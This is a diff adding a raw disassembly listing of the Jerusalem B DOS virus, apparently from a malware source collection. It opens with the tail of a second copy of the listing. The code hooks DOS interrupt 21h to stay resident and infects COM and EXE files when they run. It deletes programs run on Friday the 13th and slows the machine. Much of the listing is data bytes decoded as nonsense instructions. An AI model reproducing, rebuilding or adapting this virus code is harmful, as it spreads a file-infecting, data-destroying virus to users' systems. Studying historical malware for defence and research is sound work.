8B0E1100 MOV CX,[Y0011H] +0000:04B9 8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR 
[Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H +0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV 
AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH +0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? 
DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL 
+0000:06CF 0000 ADD [BX+SI],AL
+0000:06D1 0000 ADD [BX+SI],AL
+0000:06D3 0000 ADD [BX+SI],AL
+0000:06D5 0000 ADD [BX+SI],AL
+0000:06D7 0000 ADD [BX+SI],AL
+0000:06D9 005718 ADD [BX+018H],DL
+0000:06DC 0825 OR [DI],AH
+0000:06DE A5 MOVSW
+0000:06DF FEC5 INC CH
+0000:06E1 07 POP ES
+0000:06E2 1E PUSH DS
+0000:06E3 0210 ADD DL,[BX+SI]
+0000:06E5 07 POP ES
+0000:06E6 57 PUSH DI
+0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH
+0000:06EB 0104 ADD [SI],AX
+0000:06ED 7F70 JG X075F
+
+"JV.MOC" PAGE 0014
+
+0000:06EF 0010 ADD [BX+SI],DL
+0000:06F1 07 POP ES
+0000:06F2 1D001C SBB AX,01C00H
+0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP
+0000:06F9 0C1B OR AL,01BH
+0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH]
+0000:06FF F24D REPNE DEC BP
+0000:0701 360E PUSH CS
+0000:0703 0300 ADD AX,[BX+SI]
+0000:0705 0000 ADD [BX+SI],AL
+0000:0707 00EE ADD DH,CH
+0000:0709 002A X0709: ADD [BP+SI],CH
+0000:070B 0F POP CS
+0000:070C 42 INC DX
+0000:070D 01C1 ADD CX,AX
+0000:070F 0DB44C OR AX,04CB4H
+0000:0712 B000 MOV AL,00H
+0000:0714 CD21 X0714: INT 021H
+0000:0716 4D DEC BP
+0000:0717 7344 JAE X075D
+0000:0719 6F73 JG X078E
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru.asm b/MSDOS/Virus.MSDOS.Unknown.jeru.asm
new file mode 100644
index 00000000..556a184d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.jeru.asm
@@ -0,0 +1,794 @@
+This is the Jerusalem B Virus.
+"JV.MOC" PAGE 0001
+
+0000:0000 E99200 JMP X0095
+0000:0003 7355 JAE X005A
+0000:0005 4D DEC BP
+0000:0006 7344 JAE X004C
+0000:0008 6F73 JG X007D
+0000:000A 0001 ADD [BX+DI],AL
+0000:000C BD1700 MOV BP,0017H
+0000:000F 0000 ADD [BX+SI],AL
+0000:0011 06 PUSH ES
+0000:0012 00A5FE00 ADD [DI+Y00FEH],AH
+0000:0016 F016 LOCK PUSH SS
+0000:0018 17 POP SS
+0000:0019 7702 JA X001D
+0000:001B BF053D MOV DI,03D05H
+0000:001E 0CFB OR AL,0FBH
+0000:0020 7D00 JGE X0022
+0000:0022 0000 X0022: ADD [BX+SI],AL
+0000:0024 0000 ADD [BX+SI],AL
+0000:0026 0000 ADD [BX+SI],AL
+0000:0028 0000 ADD [BX+SI],AL
+0000:002A 0000 ADD [BX+SI],AL
+0000:002C 0000 ADD [BX+SI],AL
+0000:002E E8062A CALL X2A37
+0000:0031 B10D MOV CL,0DH
+0000:0033 800000 ADD BYTE PTR [BX+SI],00H
+0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL
+0000:003A 0D5C00 OR AX,005CH
+0000:003D B10D MOV CL,0DH
+0000:003F 6C00 JL X0041
+0000:0041 B10D X0041: MOV CL,0DH
+0000:0043 0004 ADD [SI],AL
+0000:0045 5F POP DI
+0000:0046 0F POP CS
+0000:0047 B400 MOV AH,00H
+0000:0049 C1 RET ; INTRASEGMENT
+0000:004A 0D00F0 X004A: OR AX,0F000H
+0000:004D 06 PUSH ES
+0000:004E 004D5A ADD [DI+05AH],CL
+0000:0051 2000 AND [BX+SI],AL
+0000:0053 1000 ADC [BX+SI],AL
+0000:0055 1900 SBB [BX+SI],AX
+0000:0057 0800 OR [BX+SI],AL
+0000:0059 7500 JNZ X005B
+0000:005B 7500 X005B: JNZ X005D
+0000:005D 6901 X005D: JNS X0060
+0000:005F 1007 ADC [BX],AL
+0000:0061 8419 TEST BL,[BX+DI]
+0000:0063 C500 LDS AX,[BX+SI]
+0000:0065 6901 JNS X0068
+0000:0067 1C00 SBB AL,00H
+0000:0069 0000 ADD [BX+SI],AL
+0000:006B 4C X006B: DEC SP
+0000:006C B000 MOV AL,00H
+0000:006E CD21 INT 021H
+0000:0070 050020 ADD AX,02000H
+0000:0073 0037 ADD [BX],DH
+
+"JV.MOC" PAGE 0002
+
+0000:0075 121C ADC BL,[SI]
+0000:0077 0100 ADD [BX+SI],AX
+0000:0079 0210 ADD DL,[BX+SI]
+0000:007B 0010 ADD [BX+SI],DL
+0000:007D 17 X007D: POP SS
+0000:007E 0000 ADD [BX+SI],AL
+0000:0080 53 PUSH BX
+0000:0081 61E8 JNO X006B
+0000:0083 38434F CMP
[BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV 
CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV 
AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H 
+0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H 
+0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 
MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 